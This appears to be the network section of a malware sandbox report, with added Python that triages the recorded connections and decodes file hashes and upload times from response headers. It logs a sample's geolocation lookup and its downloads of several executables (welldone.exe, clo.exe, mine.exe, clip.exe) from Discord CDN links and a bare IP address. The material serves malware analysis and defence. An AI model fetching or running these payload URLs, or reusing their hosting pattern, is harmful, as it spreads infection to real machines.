Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
ocsp.digicert.com | CNAME cs9.wac.phicdn.net | 117.18.237.29 |
api.ip.sb | 104.26.13.31 | |
cdn.discordapp.com | 162.159.129.233 | |
TCP Requests
- 192.168.56.102:49191 -> 117.18.237.29:80 (ocsp.digicert.com)
- 192.168.56.102:49192 -> 117.18.237.29:80 (ocsp.digicert.com)
- 192.168.56.102:49189 -> 162.159.129.233:443 (cdn.discordapp.com)
- 192.168.56.102:49190 -> 162.159.130.233:443 (cdn.discordapp.com)
- 192.168.56.102:49163 -> 172.67.75.172:443 (api.ip.sb)
- 192.168.56.102:49172 -> 45.137.190.166:80 (no hostname; plaintext HTTP to a bare IP)
- 192.168.56.102:49161 -> 95.217.159.87:4348 (no hostname; non-standard port, no HTTP transaction recorded for this flow)
UDP Requests
- 192.168.56.102:58318 -> 164.124.101.2:53 (DNS)
- 192.168.56.102:60922 -> 164.124.101.2:53 (DNS)
- 192.168.56.102:62770 -> 164.124.101.2:53 (DNS)
- 192.168.56.102:63203 -> 164.124.101.2:53 (DNS)
- 192.168.56.102:65038 -> 164.124.101.2:53 (DNS)
- 192.168.56.102:137 -> 192.168.56.255:137 (NetBIOS name service broadcast)
- 192.168.56.102:138 -> 192.168.56.255:138 (NetBIOS datagram broadcast)
- 192.168.56.102:62773 -> 239.255.255.250:1900 (SSDP multicast)
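The connection lists above are all the report records for the flows that carried no HTTP transaction, so a first triage pass is just a rule set over those records. The following Python is an added example (not part of this report or of any sandbox's own code) that parses the TCP/UDP records above, reproduced inline as a constructed sample with a space separating the destination port from the hostname, and separates OS background traffic (resolver DNS, NetBIOS/SSDP broadcasts, OCSP) from the destinations worth blocking or pivoting on. The verdict tiers, the host lists and the assumption that the sandbox VM sits in a /24 are the example's own choices.

```python
import ipaddress
import re

# Constructed sample: the TCP/UDP connection records from this report, one
# "proto src:port dst:port [hostname]" record per line (UDP records have none).
CONNECTIONS = """\
tcp 192.168.56.102:49191 117.18.237.29:80 ocsp.digicert.com
tcp 192.168.56.102:49192 117.18.237.29:80 ocsp.digicert.com
tcp 192.168.56.102:49189 162.159.129.233:443 cdn.discordapp.com
tcp 192.168.56.102:49190 162.159.130.233:443 cdn.discordapp.com
tcp 192.168.56.102:49163 172.67.75.172:443 api.ip.sb
tcp 192.168.56.102:49172 45.137.190.166:80
tcp 192.168.56.102:49161 95.217.159.87:4348
udp 192.168.56.102:58318 164.124.101.2:53
udp 192.168.56.102:137 192.168.56.255:137
udp 192.168.56.102:138 192.168.56.255:138
udp 192.168.56.102:62773 239.255.255.250:1900
"""

RECORD = re.compile(r"^(tcp|udp)\s+(\S+):(\d+)\s+(\S+):(\d+)(?:\s+(\S+))?$")

# Hostnames whose presence alone explains the flow (Windows background traffic).
BENIGN_HOSTS = {"ocsp.digicert.com"}
# Public file-hosting services routinely abused for second-stage payloads.
ABUSED_CDNS = {"cdn.discordapp.com"}
# External-IP / geolocation services malware uses for region or sandbox checks.
RECON_HOSTS = {"api.ip.sb"}


def parse(text):
    """Turn the record lines into dicts; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = RECORD.match(line.strip())
        if not m:
            continue
        proto, src, sport, dst, dport, host = m.groups()
        rows.append({"proto": proto, "src": src, "sport": int(sport),
                     "dst": dst, "dport": int(dport), "host": host})
    return rows


def classify(row):
    """Return (verdict, reason) for one record. Verdicts: benign, suspicious, high."""
    dst = ipaddress.ip_address(row["dst"])
    # Assumption: the analysis VM lives in a /24, so src/24's broadcast is local.
    lan = ipaddress.ip_network(f"{row['src']}/24", strict=False)
    port, host = row["dport"], row["host"]
    if row["proto"] == "udp" and port == 53:
        return "benign", "DNS query to resolver"
    if dst.is_multicast or dst == lan.broadcast_address:
        return "benign", "local broadcast/multicast (NetBIOS/SSDP)"
    if host in BENIGN_HOSTS:
        return "benign", "certificate revocation check (OCSP)"
    if host in RECON_HOSTS:
        return "suspicious", "external IP / geolocation lookup"
    if host in ABUSED_CDNS:
        return "suspicious", "public CDN commonly abused for payload hosting"
    if host is None and port in (80, 443):
        return "suspicious", "web request to bare IP, no DNS resolution"
    if host is None:
        return "high", f"non-standard port {port} to bare IP, no DNS resolution"
    return "review", "named host, no rule matched"


def triage(text):
    """Map each non-benign destination ("ip:port") to its (verdict, reason)."""
    out = {}
    for row in parse(text):
        verdict, reason = classify(row)
        if verdict != "benign":
            out[f"{row['dst']}:{row['dport']}"] = (verdict, reason)
    return out


if __name__ == "__main__":
    for dst, (verdict, reason) in sorted(triage(CONNECTIONS).items()):
        print(f"{verdict:10} {dst:24} {reason}")
```

Run against the records above, the two destinations that survive triage with no hostname are 45.137.190.166:80 and 95.217.159.87:4348; the latter ranks highest because nothing else in the report explains it.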
GET https://api.ip.sb/geoip -> 200
(JSON geolocation of the sandbox's egress IP; the sample's first outbound request, issued before any payload download.)

Request:
GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response:
HTTP/1.1 200 OK
Date: Sat, 31 Jul 2021 04:57:15 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 347
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f797c2HVG3lr7jD4sSFnkgM%2B9v5n3kBigfurixTJm2z8kk0REImoaoQgSSiKJCN10AEHAYwVNzq5N9Y1W3K8qpNDjNgGiweO%2B5mLvw8AzhFO50AUMti%2Bgx6gkw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 67743ead781a0ad6-KIX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
GET https://cdn.discordapp.com/attachments/868908533897363470/870626065511501945/welldone.exe -> 200
(PE executable, 644096 bytes, served from Google Cloud Storage behind Cloudflare; the x-goog-hash md5 header and the ETag both carry the file's MD5, 4ee1fe5a7eae87277c898e6c98757e18.)

Request:
GET /attachments/868908533897363470/870626065511501945/welldone.exe HTTP/1.1
Host: cdn.discordapp.com
Accept: */*

Response:
HTTP/1.1 200 OK
Date: Sat, 31 Jul 2021 04:57:37 GMT
Content-Type: application/x-msdos-program
Content-Length: 644096
Connection: keep-alive
CF-Ray: 67743f394edf12f2-ICN
Accept-Ranges: bytes
Age: 61164
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=welldone.exe
ETag: "4ee1fe5a7eae87277c898e6c98757e18"
Expires: Sun, 31 Jul 2022 04:57:37 GMT
Last-Modified: Fri, 30 Jul 2021 11:17:09 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1627643829532942
x-goog-hash: crc32c=SE6R2w==
x-goog-hash: md5=TuH+Wn6uhyd8iY5smHV+GA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 644096
X-GUploader-UploadID: ADPycduu1Hyl4KfH4ZDbwmS4YaVqLb6ZXojoHgbkuJ_NJeIOg6_bvS08QQW8imTgQR1LQDj7QZS3AHpTag0kkHW8tRY
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k9MGbg5A9%2FoJLvQOSgVMnduG1QilHxg4DrqP42prgRHjDT0LE1aYsjhUh%2BYBb0Qli8D8sRBJPNkDKBsut8A7O7pHHbje%2BORfU0r9TsMxbUz4ougmPM9ptPt7i14fuKPP4%2ByxIg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET https://cdn.discordapp.com/attachments/868908533897363470/870626071547097128/clo.exe -> 200
(Second PE executable, 55296 bytes, from the same Discord channel ID as welldone.exe; MD5 from x-goog-hash and ETag: 296968fa478ce8b4832446c33afc37a5.)

Request:
GET /attachments/868908533897363470/870626071547097128/clo.exe HTTP/1.1
Host: cdn.discordapp.com
Accept: */*

Response:
HTTP/1.1 200 OK
Date: Sat, 31 Jul 2021 04:57:37 GMT
Content-Type: application/x-msdos-program
Content-Length: 55296
Connection: keep-alive
CF-Ray: 67743f395ef712f2-ICN
Accept-Ranges: bytes
Age: 61163
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=clo.exe
ETag: "296968fa478ce8b4832446c33afc37a5"
Expires: Sun, 31 Jul 2022 04:57:37 GMT
Last-Modified: Fri, 30 Jul 2021 11:17:10 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1627643830935637
x-goog-hash: crc32c=lvifUA==
x-goog-hash: md5=KWlo+keM6LSDJEbDOvw3pQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 55296
X-GUploader-UploadID: ADPycdvvWAxklEGnlFy54UXepi3h8q-XiFnC592niitm3GlwJowT9CFj7NyM72ilgCGoYbAM3w66fMoqRtHEtDJruAg
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GPFVXN9J0Q%2FyRmn01BpZGdEQwWeon7mQHA2pQw4IU9v7xneuzXhAZtLzeUPR271pjF28TC1hzVA2VQWIcFVDB7Xq1xy2d2yJVEqCxVpm%2BqgWdK3Bu6InkRIGNwiNFPuCGSPP4w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET http://45.137.190.166/mine.exe -> 200
(Plaintext HTTP to a bare IP with no DNS lookup; Apache/2.4.41 (Ubuntu) serving a 457216-byte PE executable.)

Request:
GET /mine.exe HTTP/1.1
Host: 45.137.190.166
Connection: Keep-Alive

Response:
HTTP/1.1 200 OK
Date: Sat, 31 Jul 2021 04:57:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 30 Jul 2021 11:34:54 GMT
ETag: "6fa00-5c8559bc7ca73"
Accept-Ranges: bytes
Content-Length: 457216
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET http://45.137.190.166/clip.exe -> 200
(Same server; identical 457216-byte size to mine.exe, Last-Modified 53 seconds later. Only a hash comparison of the downloaded files would show whether they are the same binary.)

Request:
GET /clip.exe HTTP/1.1
Host: 45.137.190.166

Response:
HTTP/1.1 200 OK
Date: Sat, 31 Jul 2021 04:57:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 30 Jul 2021 11:35:47 GMT
ETag: "6fa00-5c8559ee88691"
Accept-Ranges: bytes
Content-Length: 457216
Content-Type: application/x-msdos-program
GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D -> 200
(Windows CryptoAPI certificate revocation check, User-Agent Microsoft-CryptoAPI/6.1, reaching DigiCert's OCSP responder through the ocsp.digicert.com CNAME; background traffic rather than command-and-control.)

Request:
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com

Response:
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4881
Cache-Control: max-age=148010
Content-Type: application/ocsp-response
Date: Sat, 31 Jul 2021 04:57:37 GMT
Etag: "6104645a-5e3"
Expires: Sun, 01 Aug 2021 22:04:27 GMT
Last-Modified: Fri, 30 Jul 2021 20:43:06 GMT
Server: ECS (tkb/73A0)
X-Cache: HIT
Content-Length: 1507
GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D -> 200
(Second, identical OCSP request on a separate connection; same cached response served from a different edge node.)

Request:
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com

Response:
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 5103
Cache-Control: max-age=148232
Content-Type: application/ocsp-response
Date: Sat, 31 Jul 2021 04:57:37 GMT
Etag: "6104645a-5e3"
Expires: Sun, 01 Aug 2021 22:08:09 GMT
Last-Modified: Fri, 30 Jul 2021 20:43:06 GMT
Server: ECS (tkb/72B1)
X-Cache: HIT
Content-Length: 1507
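The report shows only headers for the four downloads, but the headers already identify the payloads. Google Cloud Storage (which Discord's CDN fronts here, hence the x-goog-* headers) returns the object's MD5 and CRC32C base64-encoded in x-goog-hash, and in these responses the ETag is the same MD5 in hex; Apache 2.4's default ETag is the file size and mtime in hex; and the numeric path segments of Discord attachment URLs are snowflake IDs whose top bits are a millisecond timestamp. The following Python is an added example, not part of this report, that recovers those values from headers copied out of the entries above (constructed samples, trimmed to the headers that matter) and cross-checks them against Content-Length and Last-Modified. The function names are the example's own.

```python
import base64
from datetime import datetime, timezone

# Constructed samples: response headers copied from this report, trimmed.
DISCORD_WELLDONE = """\
HTTP/1.1 200 OK
Content-Type: application/x-msdos-program
Content-Length: 644096
Content-Disposition: attachment;%20filename=welldone.exe
ETag: "4ee1fe5a7eae87277c898e6c98757e18"
Last-Modified: Fri, 30 Jul 2021 11:17:09 GMT
x-goog-hash: crc32c=SE6R2w==
x-goog-hash: md5=TuH+Wn6uhyd8iY5smHV+GA==
"""

DISCORD_CLO = """\
HTTP/1.1 200 OK
Content-Length: 55296
ETag: "296968fa478ce8b4832446c33afc37a5"
x-goog-hash: crc32c=lvifUA==
x-goog-hash: md5=KWlo+keM6LSDJEbDOvw3pQ==
"""

APACHE_MINE = """\
HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 30 Jul 2021 11:34:54 GMT
ETag: "6fa00-5c8559bc7ca73"
Content-Length: 457216
"""

DISCORD_EPOCH_MS = 1420070400000  # Discord snowflake epoch: 2015-01-01T00:00:00Z


def parse_headers(raw):
    """Split a captured response into (lowercased name, value) pairs, keeping
    repeated headers such as the two x-goog-hash lines."""
    pairs = []
    for line in raw.splitlines():
        if line.startswith("HTTP/") or ":" not in line:
            continue
        name, value = line.split(":", 1)
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def header(pairs, name):
    """First value of a header, or None."""
    return next((v for n, v in pairs if n == name), None)


def gcs_hashes(pairs):
    """Decode x-goog-hash values (base64 digests) into hex, keyed by algorithm."""
    out = {}
    for n, v in pairs:
        if n == "x-goog-hash" and "=" in v:
            algo, b64 = v.split("=", 1)
            out[algo] = base64.b64decode(b64).hex()
    return out


def etag_matches_md5(pairs):
    """True when the (unquoted) ETag equals the hex MD5 from x-goog-hash."""
    etag = (header(pairs, "etag") or "").strip('"')
    return etag != "" and etag == gcs_hashes(pairs).get("md5")


def apache_etag(etag):
    """Apache 2.4 default FileETag (MTime Size) is "<size hex>-<mtime hex>" with
    mtime in microseconds since the epoch. Returns (size, mtime as UTC datetime)."""
    size_hex, mtime_hex = etag.strip('"').split("-")
    size, mtime_us = int(size_hex, 16), int(mtime_hex, 16)
    mtime = datetime.fromtimestamp(mtime_us // 1_000_000, tz=timezone.utc)
    return size, mtime.replace(microsecond=mtime_us % 1_000_000)


def apache_etag_consistent(pairs):
    """Cross-check the Apache ETag against Content-Length and Last-Modified."""
    size, mtime = apache_etag(header(pairs, "etag"))
    last_mod = datetime.strptime(header(pairs, "last-modified"),
                                 "%a, %d %b %Y %H:%M:%S GMT").replace(tzinfo=timezone.utc)
    return size == int(header(pairs, "content-length")) and \
        int(mtime.timestamp()) == int(last_mod.timestamp())


def discord_snowflake_time(snowflake):
    """Discord IDs are snowflakes: bits 22 and up are milliseconds since the
    Discord epoch, so an attachment ID dates its upload."""
    ms = (int(snowflake) >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


if __name__ == "__main__":
    for name, raw in (("welldone.exe", DISCORD_WELLDONE), ("clo.exe", DISCORD_CLO)):
        p = parse_headers(raw)
        print(name, gcs_hashes(p), "etag==md5:", etag_matches_md5(p))
    mine = parse_headers(APACHE_MINE)
    print("mine.exe", apache_etag(header(mine, "etag")), apache_etag_consistent(mine))
    print("attachment 870626065511501945 uploaded",
          discord_snowflake_time(870626065511501945).isoformat())
```

Two results are worth carrying forward. The MD5 values decoded from the Discord responses (4ee1fe5a7eae87277c898e6c98757e18 for welldone.exe, 296968fa478ce8b4832446c33afc37a5 for clo.exe) can be used for hash lookups without handling the binaries, and the snowflake time of attachment 870626065511501945 (11:17:09 UTC on 30 Jul 2021) matches its Last-Modified header, which puts the Discord uploads about 18 minutes before mine.exe and clip.exe were placed on 45.137.190.166.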
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49163 -> 172.67.75.172:443 (api.ip.sb) | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 5e:7d:19:2d:d7:66:0c:63:45:a5:24:8f:b7:db:35:a7:61:6d:89:0e |
TLS 1.2 192.168.56.102:49190 -> 162.159.130.233:443 (cdn.discordapp.com) | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 54:e1:a7:9d:cc:c8:60:86:f1:a5:da:74:0e:5a:ab:45:df:37:8a:78 |
TLS 1.2 192.168.56.102:49189 -> 162.159.129.233:443 (cdn.discordapp.com) | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 54:e1:a7:9d:cc:c8:60:86:f1:a5:da:74:0e:5a:ab:45:df:37:8a:78 |
Snort Alerts
No Snort Alerts